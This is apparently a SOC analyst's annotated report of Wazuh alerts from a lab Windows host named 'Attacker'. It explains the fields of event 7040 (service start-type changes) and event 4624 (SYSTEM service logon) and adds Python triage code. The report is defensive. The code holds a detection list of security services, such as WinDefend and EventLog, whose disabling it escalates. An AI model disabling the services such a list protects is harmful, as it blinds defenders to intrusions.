TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered event text. Everything from "This event is generated…" onward is Microsoft's fixed boilerplate for 4624; the parsed data.win.eventdata fields below carry the same values and are the ones to filter on.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 is the well-known SID for NT AUTHORITY\SYSTEM (LocalSystem).

data.win.eventdata.subjectUserName:  ATTACKER$
Account that requested the logon. A trailing $ marks a computer account, so ATTACKER$ is the local machine account of host Attacker.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means the host is not domain-joined, so no domain controller saw this logon.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3e7 (999) is the fixed logon ID of the SYSTEM session; pivot on it to find other events from that session.

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account the new session was created for; again SYSTEM.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on. A service starting under LocalSystem produces exactly this.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the logged-on account. NT AUTHORITY is the pseudo-domain for built-in identities, not a real domain.

data.win.eventdata.targetLogonId:  0x3e7
Logon ID of the new session. Matches the Subject Logon ID of later events in that session and the 4634/4647 logoff event that ends it.

data.win.eventdata.logonType:  5
5 = Service: the Service Control Manager started a service under this account. Expected when the requesting process is services.exe. A type 2 (interactive), 3 (network) or 10 (RDP) logon as SYSTEM would not be.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process that requested the session. Advapi means a LogonUser call through advapi32, which is how services.exe logs service accounts on.

data.win.eventdata.authenticationPackageName:  Negotiate
Authentication package. Negotiate selects Kerberos or NTLM; for a local SYSTEM service logon no network authentication takes place.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
GUID that links a logon to the 4768/4769 Kerberos ticket events on the KDC. All zeros = no ticket involved, which is normal for a local logon.

data.win.eventdata.keyLength:  0
Length of the session key negotiated for the logon. 0 means no session key was requested, normal for local and service logons; it does not indicate a weak key. Non-zero values (e.g. 128) show up on NTLM network logons.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon. 0x304 = 772, the Service Control Manager.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Requesting process. services.exe is the Service Control Manager; a type 5 logon requested by any other image deserves a look.

data.win.eventdata.impersonationLevel:  %%1833
Windows resource string; %%1833 renders as "Impersonation" (as the message text shows), meaning the session's token can act as the account on the local system.

data.win.eventdata.virtualAccount:  %%1843
%%1843 renders as "No": the account is not a per-service virtual account (NT SERVICE\...).

data.win.eventdata.targetLinkedLogonId:  0x0
Logon ID of the paired UAC split-token session. 0x0 = none; SYSTEM has no filtered token.

data.win.eventdata.elevatedToken:  %%1842
%%1842 renders as "Yes": the session holds a full administrative token. Always Yes for SYSTEM, so on its own this is not a finding.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:43.485+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:43.485+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
Rule author's note inherited from the OSSEC ruleset: Windows 2000 does not write event 7040. Informational only.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533903.230779
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
ETW provider that wrote the event. Service Control Manager is services.exe, the component that owns service configuration, so 7040 is logged by the process that applied the change, whoever requested it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
GUID of that provider. Stable across hosts and locales, so prefer it over the display name in saved queries.

data.win.system.eventSourceName:  Service Control Manager
Legacy (pre-ETW) event source name; identical to the provider for SCM events.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). 7040 = a service's start type was changed. Learn the big ones!

data.win.system.version:  0
Schema version of the event layout; 7040 has only version 0.

data.win.system.level:  4
Numeric level: 1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose. 4 matches the INFORMATION severityValue below.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.). 0 = no category, usual for System-channel events.

data.win.system.opcode:  0
Low-level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit-flag keywords set by Windows. 0x8080000000000000 is the "Classic" keyword carried by legacy event sources; compare 0x8020000000000000 (Audit Success) on the 4624 alert below.

data.win.system.systemTime:  2025-04-20T01:54:27.8966188Z
UTC time the endpoint wrote the event. Note it is more than four days earlier than the alert timestamp above: the agent delivered a backlog, or the clocks disagree. Build the timeline on systemTime and eventRecordID, not on the Wazuh timestamp.

data.win.system.eventRecordID:  2949
Incremental log record number – handy for timeline order. The four 7040 alerts on this page are records 2949–2952, consecutive in the System log.

data.win.system.processID:  772
PID of the logging process. 772 is services.exe here; the same PID appears as 0x304 in the 4624 alert below.

data.win.system.threadID:  10448
Thread inside that process; only useful to tie together events written by the same SCM worker.

data.win.system.channel:  System
Event log the record lives in. Service changes go to System; the 4624 logon alert comes from Security.

data.win.system.computer:  Attacker
Hostname as recorded by Windows; should match agent.name. A mismatch means the agent was renamed or the log was forwarded.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from auto start to demand start."
Rendered 7040 text: which service, its old start type and its new one. The same values are in param1–param4 below. 7040 does not record who made the change; a Sysmon event 13 on HKLM\SYSTEM\CurrentControlSet\Services\<name>\Start, or a 4688 for sc.exe / reg.exe in the same second, will.

data.win.eventdata.param1:  Windows Modules Installer
Display name of the service whose configuration changed.

data.win.eventdata.param2:  auto start
Previous start type (auto start, demand start or disabled).

data.win.eventdata.param3:  demand start
New start type. The changes worth escalating are security, logging or backup services moved to disabled; auto ↔ demand flips are mostly housekeeping.

data.win.eventdata.param4:  TrustedInstaller
Short (registry) name of the service. TrustedInstaller is the Windows Modules Installer used by Windows Update; its start type is commonly toggled between auto and demand during servicing, and the next alert shows it flipped back 15 seconds later. Check for an update or installer run at 01:54 on the endpoint before treating this as tampering (T1543.003), and pair 7040 with 7045/4697 (new service installed) to catch persistence.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
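The four 7040 alerts on this page are the same two services flipping between auto start and demand start within a minute, delivered to the manager four days after the fact. The following triage routine is an added example for this report, not SOCscribe or Wazuh code: it groups 7040 alerts per service, detects a change that is undone within a short window, escalates any move to "disabled" on a security service, and measures the gap between systemTime and the Wazuh timestamp so the analyst builds the timeline on the right clock. The alert dicts are constructed to mirror the alerts on this page (values copied from them) plus one invented WinDefend alert that exercises the escalation branch; the two service lists are assumptions for the example, not a vendor baseline.

```python
"""Triage of Wazuh 7040 ("Service startup type was changed") alerts.

Added example for this report; not SOCscribe or Wazuh code. SAMPLE_7040 is
constructed from the alerts on this page plus one invented WinDefend alert.
The service sets below are assumptions for the example, not a maintained baseline.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: services whose start type commonly flips auto <-> demand during
# Windows servicing, so an auto->demand->auto pair seconds apart is usually noise.
SERVICING_SERVICES = {"TrustedInstaller", "BITS", "wuauserv"}
# Assumption: services an attacker wants off; any move to "disabled" is escalated.
SECURITY_SERVICES = {"WinDefend", "Sense", "MpsSvc", "EventLog", "wscsvc", "SecurityHealthService"}


def parse_ts(value):
    """Parse both Wazuh ('...485+0000') and Windows ('...8966188Z') timestamps.
    Windows emits 7 fractional digits; strptime accepts at most 6, so trim first."""
    value = re.sub(r"(\.\d{6})\d+", r"\1", value)
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f%z")


def make_alert(alert_id, ts, system_time, record_id, display, old, new, short):
    """Build an alert dict in the shape Wazuh's windows_eventchannel decoder produces."""
    return {
        "id": alert_id, "timestamp": ts, "agent": {"name": "Attacker"},
        "data": {"win": {
            "system": {"eventID": "7040", "channel": "System", "computer": "Attacker",
                       "systemTime": system_time, "eventRecordID": record_id},
            "eventdata": {"param1": display, "param2": old, "param3": new, "param4": short},
        }},
    }


# Constructed sample: the four 7040 alerts on this page, plus one invented escalation case.
SAMPLE_7040 = [
    make_alert("1745533903.230779", "2025-04-24T22:31:43.485+0000", "2025-04-20T01:54:27.8966188Z", "2949",
               "Windows Modules Installer", "auto start", "demand start", "TrustedInstaller"),
    make_alert("1745533903.232559", "2025-04-24T22:31:43.823+0000", "2025-04-20T01:54:42.4352316Z", "2950",
               "Windows Modules Installer", "demand start", "auto start", "TrustedInstaller"),
    make_alert("1745533904.241675", "2025-04-24T22:31:44.139+0000", "2025-04-20T01:55:22.6696087Z", "2951",
               "Background Intelligent Transfer Service", "auto start", "demand start", "BITS"),
    make_alert("1745533904.243487", "2025-04-24T22:31:44.228+0000", "2025-04-20T01:55:28.8016634Z", "2952",
               "Windows Modules Installer", "auto start", "demand start", "TrustedInstaller"),
    # Invented alert, not on this page: shows the escalation branch.
    make_alert("9999999999.000001", "2025-04-24T22:31:45.000+0000", "2025-04-20T01:56:00.0000000Z", "2953",
               "Microsoft Defender Antivirus Service", "auto start", "disabled", "WinDefend"),
]


def ingest_lag(alert):
    """How long after the endpoint wrote the event the manager raised the alert."""
    return parse_ts(alert["timestamp"]) - parse_ts(alert["data"]["win"]["system"]["systemTime"])


def triage_7040(alerts, revert_window=timedelta(minutes=5)):
    """Return one verdict per alert id, ordering changes by systemTime, not by alert timestamp."""
    rows = []
    for a in alerts:
        ed, sy = a["data"]["win"]["eventdata"], a["data"]["win"]["system"]
        rows.append({"id": a["id"], "service": ed["param4"], "old": ed["param2"], "new": ed["param3"],
                     "when": parse_ts(sy["systemTime"]), "lag": ingest_lag(a)})
    by_service = defaultdict(list)
    for r in rows:
        by_service[r["service"]].append(r)
    verdicts = {}
    for r in rows:
        # A later change of the same service that exactly undoes this one within the window.
        reverted = any(o["when"] > r["when"] and o["when"] - r["when"] <= revert_window
                       and o["old"] == r["new"] and o["new"] == r["old"]
                       for o in by_service[r["service"]])
        if r["new"] == "disabled" and r["service"] in SECURITY_SERVICES:
            verdict, why = "high", "security service disabled"
        elif r["new"] == "disabled":
            verdict, why = "medium", "service disabled; confirm who changed it"
        elif r["service"] in SERVICING_SERVICES and {r["old"], r["new"]} == {"auto start", "demand start"}:
            verdict, why = "low", "auto/demand flip on a servicing component"
        else:
            verdict, why = "review", "unclassified start-type change"
        if reverted:
            why += "; reverted within %ds" % revert_window.total_seconds()
        if r["lag"] > timedelta(hours=1):
            why += "; delivered %dd late, timeline on systemTime" % r["lag"].days
        verdicts[r["id"]] = {"verdict": verdict, "service": r["service"], "reason": why}
    return verdicts


if __name__ == "__main__":
    for alert_id, v in triage_7040(SAMPLE_7040).items():
        print(alert_id, v["verdict"], v["service"], "-", v["reason"])
```

Run against the page's alerts, the three TrustedInstaller/BITS changes come out "low" (the first two also marked as reverted), every one is tagged as delivered four days late, and only the invented WinDefend → disabled alert reaches "high". The revert window is keyed on systemTime because, as this page shows, the Wazuh timestamp only tells you when the backlog arrived.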

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:43.823+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:43.823+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
Rule author's note inherited from the OSSEC ruleset: Windows 2000 does not write event 7040. Informational only.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533903.232559
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
ETW provider that wrote the event: Service Control Manager (services.exe), which owns service configuration.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
GUID of that provider; stable across hosts and locales, so prefer it over the display name in saved queries.

data.win.system.eventSourceName:  Service Control Manager
Legacy (pre-ETW) event source name; identical to the provider for SCM events.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). 7040 = a service's start type was changed. Learn the big ones!

data.win.system.version:  0
Schema version of the event layout; 7040 has only version 0.

data.win.system.level:  4
Numeric level: 4 = Information (1 Critical, 2 Error, 3 Warning, 5 Verbose).

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.). 0 = no category.

data.win.system.opcode:  0
Low-level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit-flag keywords set by Windows. 0x8080000000000000 = "Classic", the keyword of legacy event sources.

data.win.system.systemTime:  2025-04-20T01:54:42.4352316Z
UTC time the endpoint wrote the event: 15 seconds after the previous 7040 on this page, and more than four days before the alert timestamp above. Order events by systemTime, not by the Wazuh timestamp.

data.win.system.eventRecordID:  2950
Incremental log record number – handy for timeline order. Directly follows record 2949 from the previous alert.

data.win.system.processID:  772
PID of the logging process (services.exe, the same PID as the 0x304 requester in the 4624 alert below).

data.win.system.threadID:  11352
Thread inside that process; a different worker thread than the previous change, which is not significant on its own.

data.win.system.channel:  System
Event log the record lives in.

data.win.system.computer:  Attacker
Hostname as recorded by Windows; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from demand start to auto start."
Rendered 7040 text. This is the exact reverse of the previous alert: the service is being set back to auto start 15 seconds after it was set to demand start.

data.win.eventdata.param1:  Windows Modules Installer
Display name of the service whose configuration changed.

data.win.eventdata.param2:  demand start
Previous start type.

data.win.eventdata.param3:  auto start
New start type. Restoring a service to auto start is the opposite of what an attacker disabling defences would do.

data.win.eventdata.param4:  TrustedInstaller
Short (registry) name of the service. A demand → auto → demand round trip on TrustedInstaller within a minute is the pattern Windows servicing produces; confirm with the host's update history before spending more time on it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.002+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.002+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK GPG 13 (Good Practice Guide 13, protective monitoring) control mapping.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.234339
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Microsoft-Windows-Security-Auditing is the Security-log audit provider, hosted in lsass.exe.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
GUID of that provider; stable across hosts and locales, so prefer it over the display name in saved queries.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). 4624 = successful logon; its failed twin is 4625. Learn the big ones!

data.win.system.version:  3
Schema version of the event layout. Newer 4624 versions added fields such as Impersonation Level, Virtual Account and Elevated Token, so queries written against older hosts may not see them.

data.win.system.level:  0
Numeric level. Security audit events use 0 (LogAlways); read severityValue (AUDIT_SUCCESS / AUDIT_FAILURE) instead.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.). 12544 = Logon.

data.win.system.opcode:  0
Low-level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit-flag keywords set by Windows. 0x8020000000000000 = Audit Success; 0x8010000000000000 would be Audit Failure. Good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:37.9843227Z
UTC time the endpoint wrote the event. It is more than four days before the Wazuh timestamp above and 14 minutes before the 7040 service changes on this page, so the two are not obviously related. Build the timeline on systemTime.

data.win.system.eventRecordID:  43519
Incremental log record number – handy for timeline order. Security and System are separate logs, so this number does not line up with the 294x records of the 7040 alerts.

data.win.system.processID:  792
PID of the process that wrote the record. For Security audit events that is lsass.exe, not the process that requested the logon (see data.win.eventdata.processId below).

data.win.system.threadID:  9432
Thread inside lsass.exe that wrote the record; rarely useful.

data.win.system.channel:  Security
Event log the record lives in. 4624 only appears when the Audit Logon subcategory is enabled for success, which it evidently is on this host.

data.win.system.computer:  Attacker
Hostname as recorded by Windows; should match agent.name.

data.win.system.severityValue:  AUDIT_SUCCESS
Text severity. Security-channel audit events report AUDIT_SUCCESS or AUDIT_FAILURE instead of INFO/WARNING/ERROR.

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered event text. Everything from "This event is generated…" onward is Microsoft's fixed boilerplate for 4624; the parsed data.win.eventdata fields below carry the same values and are the ones to filter on.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 is the well-known SID for NT AUTHORITY\SYSTEM (LocalSystem).

data.win.eventdata.subjectUserName:  ATTACKER$
Account that requested the logon. A trailing $ marks a computer account, so ATTACKER$ is the local machine account of host Attacker.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means the host is not domain-joined, so no domain controller saw this logon.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3e7 (999) is the fixed logon ID of the SYSTEM session; pivot on it to find other events from that session.

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account the new session was created for; again SYSTEM.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on. A service starting under LocalSystem produces exactly this.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the logged-on account. NT AUTHORITY is the pseudo-domain for built-in identities, not a real domain.

data.win.eventdata.targetLogonId:  0x3e7
Logon ID of the new session. Matches the Subject Logon ID of later events in that session and the 4634/4647 logoff event that ends it.

data.win.eventdata.logonType:  5
5 = Service: the Service Control Manager started a service under this account. Expected when the requesting process is services.exe; this is why the T1078 mapping above should not be read as a finding by itself. A type 2 (interactive), 3 (network) or 10 (RDP) logon as SYSTEM would be a different matter.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process that requested the session. Advapi means a LogonUser call through advapi32, which is how services.exe logs service accounts on.

data.win.eventdata.authenticationPackageName:  Negotiate
Authentication package. Negotiate selects Kerberos or NTLM; for a local SYSTEM service logon no network authentication takes place.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
GUID that links a logon to the 4768/4769 Kerberos ticket events on the KDC. All zeros = no ticket involved, which is normal for a local logon.

data.win.eventdata.keyLength:  0
Length of the session key negotiated for the logon. 0 means no session key was requested, normal for local and service logons; it does not indicate a weak key. Non-zero values (e.g. 128) show up on NTLM network logons.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon. 0x304 = 772, the Service Control Manager, which is also the processID on the 7040 alerts of this page.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Requesting process. services.exe is the Service Control Manager; a type 5 logon requested by any other image deserves a look.

data.win.eventdata.impersonationLevel:  %%1833
Windows resource string; %%1833 renders as "Impersonation" (as the message text shows), meaning the session's token can act as the account on the local system.

data.win.eventdata.virtualAccount:  %%1843
%%1843 renders as "No": the account is not a per-service virtual account (NT SERVICE\...).

data.win.eventdata.targetLinkedLogonId:  0x0
Logon ID of the paired UAC split-token session. 0x0 = none; SYSTEM has no filtered token.

data.win.eventdata.elevatedToken:  %%1842
%%1842 renders as "Yes": the session holds a full administrative token. Always Yes for SYSTEM, so on its own this is not a finding.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
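The fields above are a service logon (type 5) requested by services.exe for LocalSystem under the host's own machine account, which is the background activity every Windows box generates and not the T1078 "Valid Accounts" use the rule tag suggests. The routine below is an added example for this report, not SOCscribe or Wazuh code: it decodes the raw eventdata (logon type number, the %%1833/%%1842/%%1843 resource strings, the requesting image) and applies the triage rule an analyst would: a type 5 logon for SYSTEM from services.exe under the machine account is expected; service logons for named accounts, NewCredentials (type 9) logons, and network or RDP logons are handed to a human with the source address. SAMPLE_4624 is constructed from the eventdata of this alert; the resource-string table covers only the codes that appear on this page, and the two extra test inputs are invented variations.

```python
"""Decode and triage the eventdata of a Wazuh-forwarded Windows 4624 logon event.

Added example for this report; not SOCscribe or Wazuh code. SAMPLE_4624 is
constructed from the eventdata values of the 4624 alert on this page. The
resource-string table covers only the %% codes that appear here.
"""
import ntpath

LOGON_TYPES = {
    "2": "Interactive", "3": "Network", "4": "Batch", "5": "Service", "7": "Unlock",
    "8": "NetworkCleartext", "9": "NewCredentials", "10": "RemoteInteractive", "11": "CachedInteractive",
}
# Windows substitutes these resource strings into the rendered message text.
RESOURCE_STRINGS = {"%%1833": "Impersonation", "%%1842": "Yes", "%%1843": "No"}
LOCAL_SYSTEM_SID = "S-1-5-18"

# Constructed sample: the eventdata block of the 4624 alert on this page, keys as Wazuh decodes them.
SAMPLE_4624 = {
    "subjectUserSid": "S-1-5-18", "subjectUserName": "ATTACKER$", "subjectDomainName": "WORKGROUP",
    "subjectLogonId": "0x3e7", "targetUserSid": "S-1-5-18", "targetUserName": "SYSTEM",
    "targetDomainName": "NT AUTHORITY", "targetLogonId": "0x3e7", "logonType": "5",
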